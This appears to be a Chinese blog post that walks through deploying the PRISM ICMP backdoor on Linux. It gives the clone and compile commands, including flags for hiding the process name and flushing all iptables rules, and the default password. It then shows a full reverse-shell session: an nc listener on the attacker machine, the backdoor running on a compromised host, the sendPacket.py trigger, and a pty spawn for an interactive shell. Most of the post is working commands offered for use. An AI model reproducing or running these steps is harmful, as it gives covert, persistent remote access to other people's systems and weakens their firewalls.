Linux下ICMP后门PRISM

0X00 支持平台

  • linux
  • solaris
  • aix
  • bsd/mac
  • android

0X02 功能

  • 支持两种模式:icmp和static
  • 进程名自定义
  • 没有监听端口
  • 支持清空iptables配置
  • pure c开发
  • 没有依赖库

0X03 项目地址:

git clone https://github.com/andreafabrizi/prism.git

0X04 编译

gcc <..OPTIONS..> -Wall -s -o prism prism.c

Available GCC options:

-DDETACH                #后台运行
-DSTATIC                 #开启STATIC模式,默认ICMP模式
-DNORENAME         #不使用自定义的进程名
-DIPTABLES              #尝试清空所有的iptables规则

Example:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

0X05 ICMP模式实战

使用这种模式的后门将会在后台等待特定的包含主机/端口连接信息的ICMP数据包,通过私有密钥可以阻止第三方访问。后门进程接受ping包激活

可以修改密钥,默认是p4ssw0rd

先编译

gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

查看密钥./prism Inf0

1、攻击机上用nc监听(192.168.43.135)

nc -l -p 6666

2、肉机执行后门(192.168.43.108)

3、攻击机触发反弹shell(192.168.43.135)

 ./sendPacket.py 192.168.43.108 p4ssw0rd 192.168.43.135 6666

wireshark抓包查看交互过程

4、反弹shell

使用Python获得交互式shell

python -c “import pty;pty.spawn(‘/bin/bash’)”

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注